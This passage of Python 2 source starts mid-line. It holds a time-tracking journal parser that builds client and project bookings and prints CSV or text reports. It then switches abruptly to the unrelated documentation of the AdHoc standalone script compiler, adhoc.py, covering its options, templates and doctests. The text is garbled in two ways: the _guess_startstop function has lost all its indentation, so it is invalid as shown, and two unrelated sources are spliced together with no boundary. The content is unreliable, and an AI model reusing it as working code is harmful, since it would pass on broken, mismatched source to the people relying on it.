                                              self.start_time)
            end = datetime.datetime.combine(self.current_date,
                                            self.last_funny_datetime.time())
            booking = Booking(start, end, '\n'.join(self.last_comments))
            if getattr(self, 'last_project', None) is not None:
                self.last_project.bookings.append(booking)
            elif getattr(self, 'last_client', None) is not None:
                project = self.last_client.projects['NO PROJECT']
                project.bookings.append(booking)
        if self.first_day is None or date < self.first_day:
            self.first_day = date
        if self.last_day is None or date > self.last_day:
            self.last_day = date
        self.current_date = date
        self.last_time = None
        self.start_time = None
        self.last_interval = None
        self.last_client = None
        self.last_project = None
        self.last_funny_datetime = None
        self.last_comments = []

    def _journal_file(self, month, year):
        """Return the journal path for a numeric month/year, e.g.
        BASEDIR/month-January-2010.txt."""
        m = MONTHS[month]
        m = m[0].upper() + m[1:]
        return os.path.join(BASEDIR, 'month-%s-%s.txt' % (m, year))

    def _handle_client_project(self, v):
        """Parse a 'client: project' line and make the named client and
        project current (creating them on first sight)."""
        client, project_name = client_and_project(v)
        client = CLIENT_MAPPINGS.get(client, client)
        client_obj = self.clients.get(client, Client(client))
        self.clients[client] = client_obj
        self.last_client = client_obj
        if project_name is not None:
            projects = client_obj.projects
            project = projects.get(project_name, Project(project_name))
            projects[project_name] = project
            self.last_project = project
        else:
            self.last_project = None

    def process(self, month, year):
        """Parse one month's journal file.  month may be a name or a
        number, year a string or an int."""
        if isinstance(month, basestring):
            month = MONTHS.index(month.lower())
        if isinstance(year, basestring):
            year = int(year)
        f = open(self._journal_file(month, year), 'r')
        try:
            self.process_input(f)
        finally:
            f.close()

    def process_input(self, f):
        """Parse an iterable of journal lines, updating internal state.

        Recognized line types, tried in order: bare clock time (starts
        or closes a work interval), "stopped at HH:MM" markers, "Day:"
        headers, lines containing a clock time (remembered as a possible
        interval end), and anything else, which is collected as comment
        text for the current booking.
        """
        for line in f:
            stripped = line.strip()
            if not stripped:
                continue
            # Collect per-day "action" notes regardless of line type.
            for action, exprs in ACTION_MAPPINGS.items():
                for expr in exprs:
                    if expr.search(stripped) is not None:
                        day = self.actions.get(self.current_date, {})
                        self.actions[self.current_date] = day
                        category = day.get(action, [])
                        day[action] = category
                        category.append(stripped)
            record_comment = True
            if self.state is STATE_JUST_READ_TIME:
                # The previous line was a bare time, so this line may
                # name the client/project the interval belongs to.
                self.last_comments = []
                if not stripped.startswith('-'):
                    self._handle_client_project(stripped)
                    record_comment = False
                self.state = STATE_NONE
            m = RE_ONLY_TIME.match(stripped)
            if m is not None:
                self.state = STATE_JUST_READ_TIME
                self._handle_time(stripped)
                record_comment = False
            if m is None:
                m = RE_STOPPED.search(stripped)
                if m is not None:
                    self._handle_time(stripped, True)
                    record_comment = False
            if m is None:
                m = RE_DAY_BEGINS.search(stripped)
                if m is not None:
                    year = int(m.group(3))
                    day = int(m.group(2))
                    month = MONTHS.index(m.group(1).lower())
                    date = datetime.date(year, month, day)
                    self._start_day(date)
                    record_comment = False
            if m is None:
                m = RE_TIME.search(stripped)
                if m is not None:
                    comb = datetime.datetime.combine
                    self.last_funny_datetime = comb(self.current_date,
                                                    parse_time(stripped))
                    record_comment = False
            if record_comment:
                self.last_comments.append(stripped)

    def _handle_time(self, v, stopped=False):
        """React to a time marker: the first time of a pair opens an
        interval; the second closes it and records a Booking.  With
        stopped=True the interval ends and no new one is opened."""
        tm = parse_time(v.strip())
        if self.start_time is None:
            self.start_time = tm
            self.last_project = None
            self.last_client = None
        else:
            start = datetime.datetime.combine(self.current_date,
                                              self.start_time)
            end = datetime.datetime.combine(self.current_date,
                                            tm)
            if self.last_funny_datetime is not None and not stopped:
                # A time seen inside the interval's text overrides the
                # closing time.
                comb = datetime.datetime.combine
                end = comb(self.current_date,
                           self.last_funny_datetime.time())
            booking = Booking(start, end, '\n'.join(self.last_comments))
            if self.last_project is not None:
                self.last_project.bookings.append(booking)
            elif self.last_client is not None:
                project = self.last_client.projects['NO PROJECT']
                project.bookings.append(booking)
            self.last_interval = end - start
            if stopped:
                self.start_time = None
            else:
                self.start_time = tm
            if self.last_interval.days < 0:
                raise ValueError("Error on day: %s (%s, %s)" % \
                                 (fancy_datetime(self.current_date),
                                  start,
                                  end))
        self.last_funny_datetime = None
        self._last_time = tm

    def _build_filtered(self, client_filter, project_filter,
                        comment_filter,
                        date_start_filter, date_stop_filter):
        """Return an ad-hoc object holding clients/projects/bookings
        restricted by the given filters, plus earliest/latest booking
        timestamps and the matching per-day actions."""
        class Filtered(object):
            pass
        filtered = Filtered()
        filtered.clients = {}
        filtered.earliest = None
        filtered.latest = None
        filtered.bookings = BookingContainer()
        filtered.first_day = self.first_day
        filtered.last_day = self.last_day
        if date_start_filter is not None:
            filtered.first_day = date_start_filter.date()
        if date_stop_filter is not None:
            filtered.last_day = date_stop_filter.date()
        for client_name in sorted(self.clients.keys()):
            if matches(client_name, client_filter):
                client_obj = self.clients[client_name].clone()
                updated_projects = {}
                for project_name in sorted(client_obj.projects.keys()):
                    if matches(project_name, project_filter):
                        orig_project = client_obj.projects[project_name]
                        updated_project = orig_project.clone()
                        updated_project.bookings = BookingContainer()
                        # NOTE(review): the date window is only applied
                        # when date_start_filter is set; a stop filter
                        # alone is ignored -- confirm this is intended.
                        for booking in orig_project.bookings:
                            if date_start_filter is None or \
                               (booking.start >= date_start_filter and \
                                booking.start <= date_stop_filter and \
                                booking.stop >= date_start_filter and \
                                booking.stop <= date_stop_filter):
                                if comment_filter is None or \
                                   comment_filter.search(booking.comment) \
                                   is not None:
                                    filtered.bookings.append(booking)
                                    updated_project.bookings.append(booking)
                                    if filtered.earliest is None or \
                                       booking.start < filtered.earliest:
                                        filtered.earliest = booking.start
                                    if filtered.latest is None or \
                                       booking.stop > filtered.latest:
                                        filtered.latest = booking.stop
                        if len(updated_project.bookings) > 0:
                            updated_projects[project_name] = updated_project
                if len(updated_projects) > 0:
                    filtered.clients[client_name] = client_obj
                    client_obj.projects = updated_projects
        filtered.actions = {}
        for day in sorted(self.actions.keys()):
            categories = self.actions[day]
            if day >= filtered.first_day and day <= filtered.last_day:
                if categories:
                    filtered.actions[day] = categories
        return filtered

    def show_results(self, out, client_filter=None, project_filter=None,
                     date_start_filter=None, date_stop_filter=None,
                     report_type=None,
                     comment_filter=None,
                     display_bookings=False,
                     display_bookings_comments=False):
        """Render a report of the filtered data to `out`.

        report_type 'csv' emits a CSV table; anything else produces the
        human-readable text report (default: 'date').
        """
        if report_type is None:
            report_type = 'date'
        else:
            report_type = report_type.lower()
        filtered = self._build_filtered(client_filter, project_filter,
                                        comment_filter,
                                        date_start_filter, date_stop_filter)
        if report_type == 'csv':
            # NOTE(review): the CSV report writes to sys.stdout, not
            # `out` -- confirm whether that is deliberate.
            writer = csv.writer(sys.stdout)
            writer.writerow(['Client', 'Project', 'Date',
                             'Duration (hrs)', 'Comments'])
            for client_name in sorted(filtered.clients.keys()):
                client = filtered.clients[client_name]
                projects = client.projects
                for project_name in projects:
                    project = projects[project_name]
                    for booking in project.bookings:
                        tm = booking.time
                        tm = tm.seconds / 60.0 / 60.0
                        writer.writerow([client_name,
                                         project_name,
                                         booking.start.date(),
                                         tm,
                                         booking.comment])
        else:
            print >> out, "Filter:"
            if client_filter is not None:
                print >> out, "  Client(s): %s" % str(client_filter)
            if project_filter is not None:
                print >> out, "  Project(s): %s" % str(project_filter)
            if date_start_filter is not None:
                print >> out, "  Start Date: %s" \
                      % fancy_datetime(date_start_filter)
            if date_stop_filter is not None:
                print >> out, "  Stop Date: %s" \
                      % fancy_datetime(date_stop_filter)
            print >> out
            if filtered.earliest is None:
                earliest = 'N/A'
            else:
                earliest = fancy_datetime(filtered.earliest)
            print >> out, "Earliest: %s" % earliest
            # Fixed: this guard used to test filtered.earliest.
            if filtered.latest is None:
                latest = 'N/A'
            else:
                latest = fancy_datetime(filtered.latest)
            print >> out, "Latest: %s" % latest
            if filtered.earliest is None or filtered.latest is None:
                tracked = 'N/A'
            else:
                days = (filtered.latest - filtered.earliest).days
                if days > 365:
                    tracked = '%.2f years' % (days / 365.0)
                else:
                    seconds = (filtered.latest - filtered.earliest).seconds
                    minutes = seconds / 60.0
                    hours = minutes / 60.0
                    extra_days = hours / 24.0
                    tracked = '%.1f days' % (days + extra_days)
            print >> out, "Total Time Tracked: %s" % tracked
            print >> out
            print >> out, 'Dates:'
            # Regroup bookings by day -> client -> project for the
            # chronological section of the report.
            days = {}
            for client_name, client in filtered.clients.items():
                for project_name, project in client.projects.items():
                    for booking in project.bookings:
                        date = booking.start.date()
                        day = days.get(date, {'clients': {},
                                              'bookings': BookingContainer()})
                        days[date] = day
                        day['bookings'].append(booking)
                        default = {'projects': {},
                                   'bookings': BookingContainer()}
                        client_dict = day['clients'].get(client_name, default)
                        day['clients'][client_name] = client_dict
                        client_dict['bookings'].append(booking)
                        projects = client_dict['projects']
                        project_bookings = projects.get(project_name,
                                                        BookingContainer())
                        projects[project_name] = project_bookings
                        project_bookings.append(booking)
            print >> out
            for date in sorted(days.keys()):
                day = days[date]
                print >> out, "  %s (total: %s)" \
                      % (fancy_datetime(date),
                         fancy_booking_totals(day['bookings']))
                for client_name in sorted(day['clients'].keys()):
                    client = day['clients'][client_name]
                    print >> out, '    %s (total: %s)' \
                          % (FANCY_CLIENT_MAPPINGS[client_name],
                             fancy_booking_totals(client['bookings']))
                    for project_name in sorted(client['projects'].keys()):
                        bookings = client['projects'][project_name]
                        print >> out, '      %s (%s)' \
                              % (project_name, fancy_booking_totals(bookings))
                        if display_bookings:
                            for booking in bookings:
                                print >> out, '        %s to %s (%s)' \
                                      % (fancy_time(booking.start),
                                         fancy_time(booking.stop),
                                         fancy_time_amount(booking.stop -
                                                           booking.start))
                                if display_bookings_comments:
                                    if booking.comment.strip():
                                        lines = booking.comment.split('\n')
                                        for line in lines:
                                            # Fixed: comment lines used to
                                            # go to sys.stdout, bypassing
                                            # the `out` stream.
                                            print >> out, "          %s" % line
            print >> out
            print >> out, "Clients (total: %s):" \
                  % fancy_booking_totals(filtered.bookings)
            print >> out
            for client in sorted(filtered.clients.keys()):
                client_obj = filtered.clients[client]
                all_bookings = client_obj.bookings
                print >> out, '  %s (total: %s)' \
                      % (FANCY_CLIENT_MAPPINGS.get(client, client),
                         fancy_booking_totals(all_bookings))
                projects = client_obj.projects
                for project_name in sorted(projects.keys()):
                    project = projects[project_name]
                    print >> out, '    %s: %s' \
                          % (project_name,
                             fancy_time_amount(project.bookings.total_time))
                print >> out
def show_bookings(out, prefix, project, show_comments):
    """Print a per-day breakdown of a project's bookings to `out`.

    Each day gets a subtotal line, then one line per booking (marked
    with ' *' when non-billable), optionally followed by the booking's
    comment lines.

    Fixed: all output now goes to the `out` stream; previously only the
    header used `out` while the day/booking/comment lines were printed
    to sys.stdout.
    """
    print >> out, '%sBookings:' % prefix
    days = {}
    for booking in project.bookings:
        day = days.get(booking.start.date(), BookingContainer())
        days[booking.start.date()] = day
        day.append(booking)
    for day in sorted(days.keys()):
        bookings = days[day]
        print >> out, "  %s%s (subtotal: %s)" % (prefix, day,
                                                 fancy_booking_totals(bookings))
        for booking in bookings:
            hours = (booking.stop - booking.start).seconds / 3600.0
            fancy = '%s to %s (%s hrs)' % (fancy_time(booking.start),
                                           fancy_time(booking.stop), hours)
            if booking.billable:
                asterisk = ''
            else:
                asterisk = ' *'
            print >> out, "    %s%s%s" % (prefix, fancy, asterisk)
            if show_comments:
                for line in booking.comment.split('\n'):
                    print >> out, "      %s%s" % (prefix, line)
def fancy_time(v):
    """Format a time (or datetime) compactly, e.g. '9:05am'."""
    moment = v.time() if isinstance(v, datetime.datetime) else v
    text = moment.strftime('%I:%M%p').lower()
    return text[1:] if text.startswith('0') else text
def matches(v, lst):
    """Return True when lst is None (no filter) or v contains any
    element of lst as a substring.

    Fixed: a non-matching filter now returns an explicit False; the
    previous version fell off the end and returned None (callers only
    rely on truthiness, so this is backward-compatible).
    """
    if lst is None:
        return True
    return any(needle in v for needle in lst)
def parse_time(v):
    """Extract a datetime.time from v, honoring am/pm markers.

    Tries the "stopped ..." form first, then a bare time line, then a
    time embedded anywhere in the text.  Raises AttributeError when no
    pattern matches (same as before).
    """
    m = (RE_STOPPED.search(v)
         or RE_ONLY_TIME.match(v)
         or RE_TIME.search(v))
    hour = int(m.group(1))
    minute = int(m.group(2))
    marker = m.group(3)
    if marker == 'pm' and hour != 12:
        hour += 12
    elif marker == 'am' and hour == 12:
        hour = 0
    return datetime.time(hour, minute)
def client_and_project(v):
    """Split 'client: project' (or 'client/project') into a tuple.

    Both parts are lower-cased.  The project part is None when absent
    or when it reduces to nothing after stripping bookkeeping markers
    (trailing ': Nhr' totals, '[not billing]' flags, a trailing ':').

    Fixed: a project consisting solely of marker text (e.g.
    'client: [not billing]') used to crash with IndexError on
    project_name[-1]; it now yields (client, None).
    """
    pos = v.find(':')
    if pos == -1:
        pos = v.find('/')
    if pos != -1:
        client = v[:pos].strip()
        project_name = v[pos + 1:].strip()
    else:
        client = v.strip()
        project_name = None
    if project_name is not None and project_name.strip() == '':
        project_name = None
    client = client.lower()
    if project_name is not None:
        project_name = project_name.lower()
        # Drop running-total annotations such as ': 3hr'.
        m = RE_TRAILING_HOURS.search(project_name)
        if m is not None:
            project_name = project_name[:m.start()]
        pos = project_name.find('[not billing]')
        if pos > -1:
            project_name = project_name.replace('[not billing]', '').strip()
        if not project_name.strip():
            # Nothing but marker text remained.
            project_name = None
        elif project_name.endswith(':'):
            project_name = project_name[:-1]
    return (client, project_name)
def _guess_startstop(datestr):
if not datestr:
raise ValueError('datestr cannot be empty')
if datestr == 'all':
start = None
stop = None
elif datestr == 'today':
start = datetime.datetime.now()
start = datetime.datetime(start.year, start.month, start.day)
stop = datetime.datetime(start.year, start.month, start.day, 23, 59)
elif datestr == 'yesterday':
start = datetime.datetime.now() - ONE_DAY
start = datetime.datetime(start.year, start.month, start.day)
stop = datetime.datetime(start.year, start.month, start.day, 23, 59)
elif datestr == 'week':
start = datetime.datetime.now()
start = datetime.datetime(start.year, start.month, start.day)
stop = datetime.datetime(start.year, start.month, start.day, 23, 59)
start = first_weekday(start)
elif datestr == 'month':
start = datetime.datetime.now()
start = datetime.datetime(start.year, start.month, 1)
stop = last_monthday(start)
stop = datetime.datetime(stop.year, stop.month, stop.day, 23, 59)
elif datestr == 'year':
start = datetime.datetime.now()
start = datetime.datetime(start.year, 1, 1)
stop = datetime.datetime.now()
stop = datetime.datetime(stop.year, stop.month, stop.day, 23, 59)
else:
if RE_DATE.match(datestr) is not None:
start = datetime.datetime(*time.strptime(datestr, '%Y-%m-%d')[:3])
stop = datetime.datetime(start.year, start.month,
start.day, 23, 59)
else:
month_index = -1
for pos, month in enumerate(MONTHS):
if month is not None and month.startswith(datestr):
month_index = pos
break
if month_index == -1:
raise ValueError("Couldn't derive a date value from %r"
% datestr)
start = datetime.datetime.now()
start = datetime.datetime(start.year, month_index, 1)
stop = last_monthday(start)
stop = datetime.datetime(stop.year, stop.month, stop.day, 23, 59)
return start, stop
def parse_startstop(date_filter):
    """
    Takes a date range that understands common aliases and returns the start
    and stop times as a tuple.

    A range is 'START' or 'START:STOP' where each part is anything
    _guess_startstop accepts; an empty/None filter defaults to 'week'.
    """
    cleaned = (date_filter or '').strip().lower() or 'week'
    pieces = cleaned.split(':')
    first = pieces[0]
    second = pieces[1] if len(pieces) > 1 else ''
    start, stop = _guess_startstop(first)
    if second:
        # Only the stop half of the second alias is used.
        stop = _guess_startstop(second)[1]
    return start, stop
class TextFileParser(AbstractFileParser):
    """Adapter exposing journal text files through the generic
    AbstractFileParser interface."""

    def parse_input(self, input):
        """Feed the raw journal stream through a Processor and copy its
        bookings into this parser's 'client/project' interval model."""
        engine = Processor()
        engine.process_input(input)
        for client_name, client in engine.clients.items():
            for project_name, project in client.projects.items():
                target = self.projects['%s/%s' % (client_name, project_name)]
                for booking in project.bookings:
                    target.intervals.append(Interval(booking.start,
                                                     booking.stop,
                                                     booking.comment))
# @:adhoc_uncomment:@
# @:adhoc_template:@ doc/index.rst
# AdHoc Standalone Python Script Generator
# ########################################
#
# The *AdHoc* compiler can be used as a program (see `Script Usage`_)
# as well as a module (see :class:`adhoc.AdHoc`).
#
# Since the *AdHoc* compiler itself is installed as a compiled *AdHoc*
# script, it serves as its own usage example.
#
# After installation of the *adhoc.py* script, the full source can be
# obtained in directory ``__adhoc__``, by executing::
#
# adhoc.py --explode
#
# .. @@contents@@
#
# @:adhoc_template:@ doc/index.rst # off
# @:adhoc_uncomment:@
"""\
.. _Script Usage:
adhoc.py - Python ad hoc compiler.
====== ====================
usage: adhoc.py [OPTIONS] [file ...]
or import adhoc
====== ====================
Options
=======
===================== ==================================================
-c, --compile compile file(s) or standard input into output file
(default: standard output).
-d, --decompile decompile file(s) or standard input into
output directory (default ``__adhoc__``).
-o, --output OUT output file for --compile/output directory for
--decompile.
-q, --quiet suppress warnings
-v, --verbose verbose test output
--debug[=NUM] show debug information
-h, --help display this help message
--documentation display module documentation.
--template list show available templates.
--eide[=COMM] Emacs IDE template list (implies --template list).
--template[=NAME] extract named template to standard
output. Default NAME is ``-``.
--extract[=DIR] extract adhoc files to directory DIR (default: ``.``)
--explode[=DIR] explode script with adhoc in directory DIR
(default ``__adhoc__``)
--implode implode script with adhoc
--install install adhoc.py script
-t, --test run doc tests
===================== ==================================================
*adhoc.py* is compatible with Python 2.4+ and Python 3. (For Python
<2.6 the packages *stringformat* and *argparse* are needed and
included.)
.. _END_OF_HELP:
.. |=NUM| replace:: ``[=NUM]``
Script Examples
===============
Templates
---------
Sections marked by |adhoc_template| can be retrieved as templates on
standard output.
Additionally, all other files compiled into an adhoc file with one of
================ ======================
|adhoc| ==> |adhoc_import|
|adhoc_verbatim| ==> |adhoc_template_v|
|adhoc_include| ==> |adhoc_unpack|
================ ======================
are accessible as templates.
``python adhoc.py --template list`` provides a list of templates:
>>> ign = main('adhoc.py --template list'.split())
================================================= ================================ ================
Command Template Type
================================================= ================================ ================
adhoc.py --template adhoc_test # !adhoc_test adhoc_import
adhoc.py --template adhoc_test.sub # !adhoc_test.sub adhoc_import
adhoc.py --template argparse_local # !argparse_local adhoc_import
adhoc.py --template namespace_dict # !namespace_dict adhoc_import
adhoc.py --template stringformat_local # !stringformat_local adhoc_import
adhoc.py --template use_case_000_ # !use_case_000_ adhoc_import
adhoc.py --template use_case_001_templates_ # !use_case_001_templates_ adhoc_import
adhoc.py --template use_case_002_include_ # !use_case_002_include_ adhoc_import
adhoc.py --template use_case_003_import_ # !use_case_003_import_ adhoc_import
adhoc.py --template use_case_005_nested_ # !use_case_005_nested_ adhoc_import
adhoc.py --template docutils.conf # docutils.conf adhoc_template_v
adhoc.py --template # - adhoc_template
adhoc.py --template README.txt # README.txt adhoc_template
adhoc.py --template adhoc_init # -adhoc_init adhoc_template
adhoc.py --template catch-stdout # -catch-stdout adhoc_template
adhoc.py --template col-param-closure # -col-param-closure adhoc_template
adhoc.py --template doc/USE_CASES.txt # doc/USE_CASES.txt adhoc_template
adhoc.py --template doc/index.rst # doc/index.rst adhoc_template
adhoc.py --template max-width-class # -max-width-class adhoc_template
adhoc.py --template rst-to-ascii # -rst-to-ascii adhoc_template
adhoc.py --template test # -test adhoc_template
adhoc.py --template MANIFEST.in # !MANIFEST.in adhoc_unpack
adhoc.py --template Makefile # !Makefile adhoc_unpack
adhoc.py --template README.css # !README.css adhoc_unpack
adhoc.py --template doc/Makefile # !doc/Makefile adhoc_unpack
adhoc.py --template doc/_static/adhoc-logo-32.ico # !doc/_static/adhoc-logo-32.ico adhoc_unpack
adhoc.py --template doc/adhoc-logo.svg # !doc/adhoc-logo.svg adhoc_unpack
adhoc.py --template doc/conf.py # !doc/conf.py adhoc_unpack
adhoc.py --template doc/make.bat # !doc/make.bat adhoc_unpack
adhoc.py --template doc/z-massage-index.sh # !doc/z-massage-index.sh adhoc_unpack
adhoc.py --template setup.py # !setup.py adhoc_unpack
================================================= ================================ ================
``python adhoc.py --template`` prints the standard template ``-``
(closing delimiter replaced by ellipsis):
>>> ign = main('./adhoc.py --template'.split()) #doctest: +ELLIPSIS
# @:adhoc_disable... allow modification of exploded sources in original place
sys.path.append('__adhoc__')
# @:adhoc_disable...
<BLANKLINE>
# @:adhoc_run_time... The run-time class goes here
# @:adhoc_run_time_engine... settings enabled at run-time
# @:adhoc_enable...
# RtAdHoc.flat = False
# @:adhoc_enable...
# @:adhoc_run_time_engine...
<BLANKLINE>
#import adhoc # @:adhoc...
``python adhoc.py --template test`` prints the template named ``-test``.
the leading ``-`` signifies disposition to standard output:
>>> ign = main('./adhoc.py --template test'.split())
Test template.
Extract
-------
The default destination for extracting files is the current working
directory.
Files extracted consist of
- packed files generated by |adhoc_include|
- templates generated by |adhoc_verbatim|
- templates with a file destination other than standard output
``python adhoc.py --extract __adhoc_extract__`` unpacks the following files into
directory ``__adhoc_extract__``:
>>> import shutil
>>> ign = main('./adhoc.py --extract __adhoc_extract__'.split())
>>> file_list = []
>>> for dir, subdirs, files in os.walk('__adhoc_extract__'):
... file_list.extend([os.path.join(dir, file_) for file_ in files])
>>> for file_ in sorted(file_list):
... printf(file_)
__adhoc_extract__/MANIFEST.in
__adhoc_extract__/Makefile
__adhoc_extract__/README.css
__adhoc_extract__/README.txt
__adhoc_extract__/doc/Makefile
__adhoc_extract__/doc/USE_CASES.txt
__adhoc_extract__/doc/_static/adhoc-logo-32.ico
__adhoc_extract__/doc/adhoc-logo.svg
__adhoc_extract__/doc/conf.py
__adhoc_extract__/doc/index.rst
__adhoc_extract__/doc/make.bat
__adhoc_extract__/doc/z-massage-index.sh
__adhoc_extract__/docutils.conf
__adhoc_extract__/setup.py
__adhoc_extract__/use_case_000_.py
__adhoc_extract__/use_case_001_templates_.py
__adhoc_extract__/use_case_002_include_.py
__adhoc_extract__/use_case_003_import_.py
__adhoc_extract__/use_case_005_nested_.py
>>> shutil.rmtree('__adhoc_extract__')
Export
------
The default destination for exporting files is the
subdirectory ``__adhoc__``.
Files exported consist of
- imported modules generated by |adhoc|
- all files covered in section `Extract`_
``python adhoc.py --explode __adhoc_explode__`` unpacks the following files into
directory ``__adhoc_explode__``:
>>> import shutil
>>> ign = main('./adhoc.py --explode __adhoc_explode__'.split())
>>> file_list = []
>>> for dir, subdirs, files in os.walk('__adhoc_explode__'):
... file_list.extend([os.path.join(dir, file_) for file_ in files])
>>> for file_ in sorted(file_list):
... printf(file_)
__adhoc_explode__/MANIFEST.in
__adhoc_explode__/Makefile
__adhoc_explode__/README.css
__adhoc_explode__/README.txt
__adhoc_explode__/adhoc.py
__adhoc_explode__/adhoc_test/__init__.py
__adhoc_explode__/adhoc_test/sub/__init__.py
__adhoc_explode__/argparse_local.py
__adhoc_explode__/doc/Makefile
__adhoc_explode__/doc/USE_CASES.txt
__adhoc_explode__/doc/_static/adhoc-logo-32.ico
__adhoc_explode__/doc/adhoc-logo.svg
__adhoc_explode__/doc/conf.py
__adhoc_explode__/doc/index.rst
__adhoc_explode__/doc/make.bat
__adhoc_explode__/doc/z-massage-index.sh
__adhoc_explode__/docutils.conf
__adhoc_explode__/namespace_dict.py
__adhoc_explode__/rt_adhoc.py
__adhoc_explode__/setup.py
__adhoc_explode__/stringformat_local.py
__adhoc_explode__/use_case_000_.py
__adhoc_explode__/use_case_001_templates_.py
__adhoc_explode__/use_case_002_include_.py
__adhoc_explode__/use_case_003_import_.py
__adhoc_explode__/use_case_005_nested_.py
>>> shutil.rmtree('__adhoc_explode__')
File Permissions
================
- File mode is restored.
- File ownership is not restored.
- File modification times are restored.
Since only naive datetimes are recorded, this only works correctly
within the same timezone.
.. @:adhoc_index_only:@
AdHoc Module
============
.. @:adhoc_index_only:@
"""
# @:adhoc_uncomment:@
# @:adhoc_template:@ doc/index.rst
#
# Purpose
# =======
#
# *AdHoc* provides python scripts with
#
# - template facilities
# - default file generation
# - standalone module inclusion
#
# @:adhoc_index_only:@
# See also `Use Cases`_.
#
# @:adhoc_index_only:@
# *AdHoc* has been designed to provide an implode/explode cycle:
#
# ======== ======= ========= ======= =========
# source_0 xsource_0
# source_1 implode explode xsource_1
# ... ------> script.py ------> ...
# source_n xsource_n
# ======== ======= ========= ======= =========
#
# where ``xsource_i === source_i``. I.e., ``diff source_i xsource_i``
# does not produce any output.
#
# Quickstart
# ==========
#
# module.py:
#
# | # -\*- coding: utf-8 -\*-
# | mvar = 'value'
#
# script.py:
#
# | # -\*- coding: utf-8 -\*-
# | # |adhoc_run_time|
# | import module # |adhoc|
# | print('mvar: ' + module.mvar)
#
# Compilation::
#
# adhoc.py --compile script.py >/tmp/script-compiled.py
#
# Execution outside source directory::
#
# cd /tmp && python script-compiled.py
#
# shows::
#
# mvar: value
#
# Decompilation::
#
# cd /tmp && \
# mkdir -p __adhoc__ && \
# adhoc.py --decompile <script-compiled.py >__adhoc__/script.py
#
# .. |@:| replace:: ``@:``
# .. |:@| replace:: ``:@``
# .. |adhoc_run_time| replace:: |@:|\ ``adhoc_run_time``\ |:@|
# .. |adhoc| replace:: |@:|\ ``adhoc``\ |:@|
#
# Description
# ===========
#
# The *AdHoc* compiler/decompiler parses text for tagged lines and
# processes them as instructions.
#
# The minimal parsed entity is a tagged line, which is any line
# containing a recognized *AdHoc* tag.
#
# All *AdHoc* tags are enclosed in delimiters (default: |@:| and |:@|). E.g:
#
# |@:|\ adhoc\ |:@|
#
# Delimiters come in several flavors, namely line and section
# delimiters and a set of macro delimiters. By default, line and
# section delimiters are the same, but they can be defined separately.
#
# `Flags`_ are tagged lines, which denote a single option or
# command. E.g.:
#
# | import module # |@:|\ adhoc\ |:@|
# | # |@:|\ adhoc_self\ |:@| my_module_name
#
# `Sections`_ are tagged line pairs, which delimit a block of
# text. The first tagged line opens the section, the second tagged
# line closes the section. E.g.:
#
# | # |@:|\ adhoc_enable\ |:@|
# | # disabled_command()
# | # |@:|\ adhoc_enable\ |:@|
#
# `Macros`_ have their own delimiters (default: |@m| and |m>|). E.g.:
#
# | # |@m|\ MACRO_NAME\ |m>|
#
# The implementation is realized as class :class:`adhoc.AdHoc` which
# is mainly used as a namespace. The run-time part of
# :class:`adhoc.AdHoc` -- which handles module import and file export
# -- is included verbatim as class :class:`RtAdHoc` in the generated
# output.
#
# Flags
# -----
#
# :|adhoc_run_time|:
# The place where the *AdHoc* run-time code is added. This flag must
# be present in files, which use the |adhoc| import feature. It
# is not needed for the enable/disable features.
#
# This flag is ignored, if double commented. E.g.:
#
# | # # |adhoc_run_time|
#
# :|adhoc| [force] [flat | full]:
# Mark import line for run-time compilation.
#
# If ``force`` is specified, the module is imported, even if it
# was imported before.
#
# If ``flat`` is specified, the module is not recursively
# exported.
#
# If ``full`` is specified, the module is recursively
# exported. (This parameter takes priority over ``flat``).
#
# If neither ``flat`` nor ``full`` are specified,
# :attr:`adhoc.AdHoc.flat` determines the export scope.
#
# This flag is ignored, if the line is commented out. E.g.:
#
# | # import module # |adhoc|
#
# .. _adhoc_include:
#
# :|adhoc_include| file_spec, ...:
# Include files for unpacking. ``file_spec`` is one of
#
# :file:
# ``file`` is used for both input and output.
#
# :file ``from`` default-file:
# ``file`` is used for input and output. if ``file`` does not
# exist, ``default-file`` is used for input.
#
# :source-file ``as`` output-file:
# ``source-file`` is used for input. ``output-file`` is used for
# output. If ``source-file`` does not exist, ``output-file`` is
# used for input also.
#
# This flag is ignored, if double commented. E.g.:
#
# | # # |adhoc_include| file
#
# :|adhoc_verbatim| [flags] file_spec, ...:
# Include files for verbatim extraction. See adhoc_include_ for
# ``file_spec``.
#
# The files are included as |adhoc_template_v| sections. *file* is used
# as *export_file* mark. If *file* is ``--``, the template disposition
# becomes standard output.
#
# Optional flags can be any combination of ``[+|-]NUM`` for
# indentation and ``#`` for commenting. E.g.:
#
# | # |adhoc_verbatim| +4# my_file from /dev/null
#
# *my_file* (or ``/dev/null``) is read, commented and indented 4
# spaces.
#
# If the |adhoc_verbatim| tag is already indented, the specified
# indentation is subtracted.
#
# This flag is ignored, if double commented. E.g.:
#
# | # # |adhoc_verbatim| file
#
# :|adhoc_self| name ...:
# Mark name(s) as currently compiling. This is useful, if
# ``__init__.py`` imports other module parts. E.g.:
#
# | import pyjsmo # |@:|\ adhoc\ |:@|
#
# where ``pyjsmo/__init__.py`` contains:
#
# | # |@:|\ adhoc_self\ |:@| pyjsmo
# | from pyjsmo.base import * # |@:|\ adhoc\ |:@|
#
# :|adhoc_compiled|:
# If present, no compilation is done on this file. This flag is
# added by the compiler to the run-time version.
#
# Sections
# --------
#
# :|adhoc_enable|:
# Leading comment char and exactly one space are removed from lines
# in these sections.
#
# :|adhoc_disable|:
# A comment char and exactly one space are added to non-blank
# lines in these sections.
#
# :|adhoc_template| -mark | export_file:
# If mark starts with ``-``, the output disposition is standard output
# and the template is ignored, when exporting.
#
# Otherwise, the template is written to output_file during export.
#
# All template parts with the same mark/export_file are concatenated
# to a single string.
#
# :|adhoc_template_v| export_file:
# Variation of |adhoc_template|. Automatically generated by |adhoc_verbatim|.
#
# :|adhoc_uncomment|:
# Treated like |adhoc_enable| before template output.
#
# :|adhoc_indent| [+|-]NUM:
# Add or remove indentation before template output.
#
# :|adhoc_import|:
# Imported files are marked as such by the compiler. There is no
# effect during compilation.
#
# :|adhoc_unpack|:
# Included files are marked as such by the compiler. There is no
# effect during compilation.
#
# :|adhoc_remove|:
# Added sections are marked as such by the compiler. Removal is
# done when exporting.
#
# Before compilation, existing |adhoc_remove| tags are renamed to
# |adhoc_remove_|.
#
# After automatically added |adhoc_remove| sections have been
# removed during export, remaining |adhoc_remove_| tags are
# renamed to |adhoc_remove| again.
#
# .. note:: Think twice, before removing material from original
# sources at compile time. It will violate the condition
# ``xsource_i === source_i``.
#
# :|adhoc_run_time_engine|:
# The run-time class :class:`RtAdHoc` is enclosed in this special
